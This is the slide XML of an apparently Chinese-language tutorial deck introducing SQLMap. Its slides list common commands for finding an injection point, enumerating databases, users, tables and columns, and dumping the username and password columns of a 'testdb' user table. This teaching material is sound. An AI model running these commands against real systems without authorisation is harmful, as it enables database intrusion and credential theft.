              <a:ext cx="1814420"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en-US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0" err="1">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SQLMap</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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="1453648"/>
            <a:ext cx="10657184" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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Sqlmap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是一款开源的命令行自动化</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注入工具，用</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Python</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开发</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而成，</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kali</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中系统已装有</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sqlmap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；而如果在</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windows</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下使用，则需要安装</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Python</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环境。下面介绍</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Sqlmap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最为常用的命令：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05D3EB7B-9C86-4D45-BBEF-B80EE192887A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5053525" y="2801948"/>
            <a:ext cx="2751702" cy="2974617"/>
            <a:chOff x="5053525" y="2801948"/>
            <a:chExt cx="2751702" cy="2974617"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8BC49E-B23A-4F8A-B389-546E21211A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3525" y="3015269"/>
              <a:ext cx="2751700" cy="2761296"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="椭圆 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A87B5487-07B7-46FA-92E2-2E8FA5779978}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5053525" y="2801948"/>
              <a:ext cx="2751702" cy="2887017"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:no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Sqlmap</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最为常用的命令：</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEDD6404-E61E-4D79-9706-88DE535D8114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4854245" y="2928058"/>
            <a:ext cx="199278" cy="199278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0050A3"/>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3" name="文本框 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10C2C19F-BA79-4EB8-821D-25AC7013B15E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="956767" y="2801948"/>
            <a:ext cx="3888432" cy="394996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>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Sqlmap</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-u </a:t>
            </a:r>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找到注入点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="矩形 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20BB2AB2-566E-462E-A49E-4132CFEA5054}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5583946" y="5589326"/>
            <a:ext cx="199278" cy="199278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1092F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5" name="文本框 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F25F1C-0B4F-4E69-AFB1-47820D7ED591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532831" y="5337578"/>
            <a:ext cx="4032448" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="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或者 </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sqlmap</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-u </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--current-</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db</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a:p>
            <a:pPr algn="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显示当前数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="矩形 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E6D2B30-DE0F-4B39-B63B-379639A7D653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605948" y="5237938"/>
            <a:ext cx="199278" cy="199278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>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8" name="文本框 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CABB3BD-D5CD-4084-8856-8A6CFAC92989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8193571" y="3231450"/>
            <a:ext cx="3060340" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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sqlmap</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-u </a:t>
            </a:r>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–users</a:t>
            </a:r>
          </a:p>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列出数据库用户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5701DC-67CC-419D-909C-59F17AFC94B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4750653" y="4189780"/>
            <a:ext cx="199278" cy="199278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>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文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{337BF820-D6B7-4599-A487-86D7F5FD35C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917107" y="3901982"/>
            <a:ext cx="2751700" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>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sqlmap</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-u </a:t>
            </a:r>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dbs</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列出数据库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{844BEEED-293D-4342-B56E-7A2698D988ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908819" y="3516165"/>
            <a:ext cx="199278" cy="199278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0050A3"/>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0" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE79BF0-342B-4640-8DBC-83FBCE0BF829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908819" y="4986191"/>
            <a:ext cx="4128690" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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或者</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sqlmap</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-u </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--current-user</a:t>
            </a:r>
          </a:p>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当前数据库用户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1328317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fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>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childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="43" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="44" presetID="10" presetClass="entr" presetSubtype="0"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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="47" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="48" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="after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fade">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="51" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="52" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="55" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="56" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="after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9" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="0"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="45" grpId="0"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>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99E241B-4002-4B98-89C1-8A6F31F8AFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="875216"/>
            <a:ext cx="2448272" cy="508861"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="2448272"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2532843" y="864088"/>
              <a:ext cx="508859" cy="1586145"/>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2053958" y="1402731"/>
              <a:ext cx="1814420"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en-US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0" err="1">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SQLMap</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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="1453648"/>
            <a:ext cx="10657184" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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Sqlmap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是一款开源的命令行自动化</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注入工具，用</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Python</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开发</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而成，</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kali</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中系统已装有</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sqlmap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；而如果在</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windows</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下使用，则需要安装</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Python</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环境。下面介绍</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Sqlmap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最为常用的命令：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05D3EB7B-9C86-4D45-BBEF-B80EE192887A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5053525" y="2801948"/>
            <a:ext cx="2751702" cy="2974617"/>
            <a:chOff x="5053525" y="2801948"/>
            <a:chExt cx="2751702" cy="2974617"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8BC49E-B23A-4F8A-B389-546E21211A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3525" y="3015269"/>
              <a:ext cx="2751700" cy="2761296"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="椭圆 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A87B5487-07B7-46FA-92E2-2E8FA5779978}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5053525" y="2801948"/>
              <a:ext cx="2751702" cy="2887017"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:no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Sqlmap</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最为常用的命令：</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEDD6404-E61E-4D79-9706-88DE535D8114}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4854245" y="2928058"/>
            <a:ext cx="199278" cy="199278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0050A3"/>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3" name="文本框 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10C2C19F-BA79-4EB8-821D-25AC7013B15E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-339377" y="2648060"/>
            <a:ext cx="5184576" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>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sqlmap</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-u </a:t>
            </a:r>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--tables -D   “</a:t>
            </a:r>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testdb</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pPr algn="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列出</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testdb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数据库的表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="文本框 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F25F1C-0B4F-4E69-AFB1-47820D7ED591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="803803" y="5097300"/>
            <a:ext cx="4405001" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>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sqlmap</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-u </a:t>
            </a:r>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--columns -T "user" -D "</a:t>
            </a:r>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testdb</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列出</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testdb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数据库</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user</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表的列</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="矩形 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E6D2B30-DE0F-4B39-B63B-379639A7D653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605948" y="5237938"/>
            <a:ext cx="199278" cy="199278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>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8" name="文本框 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CABB3BD-D5CD-4084-8856-8A6CFAC92989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8301583" y="3110529"/>
            <a:ext cx="3599905" cy="1010549"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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sqlmap</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-u </a:t>
            </a:r>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--dump -C “</a:t>
            </a:r>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id,username,password</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-T “user” -D “</a:t>
            </a:r>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testdb</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矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5701DC-67CC-419D-909C-59F17AFC94B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317491" y="5337031"/>
            <a:ext cx="199278" cy="199278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>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矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{844BEEED-293D-4342-B56E-7A2698D988ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7908819" y="3516165"/>
            <a:ext cx="199278" cy="199278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0050A3"/>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0" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE79BF0-342B-4640-8DBC-83FBCE0BF829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7864332" y="5025680"/>
            <a:ext cx="4128690" cy="702773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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列出</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testdb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数据 库</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user</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表的</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id,username,password</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这几列的数据</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="464947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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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fade">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>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3" grpId="0"/>
      <p:bldP spid="45" grpId="0"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>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99E241B-4002-4B98-89C1-8A6F31F8AFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="596727" y="875216"/>
            <a:ext cx="2448272" cy="508861"/>
            <a:chOff x="1420106" y="1402730"/>
            <a:chExt cx="2448272"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2532843" y="864088"/>
              <a:ext cx="508859" cy="1586145"/>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2053958" y="1402731"/>
              <a:ext cx="1814420"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具体实践</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3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4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="文本框 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2C57A0D-0707-41A0-98AF-CC5988247A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100783" y="1453648"/>
            <a:ext cx="10657184" cy="1879505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
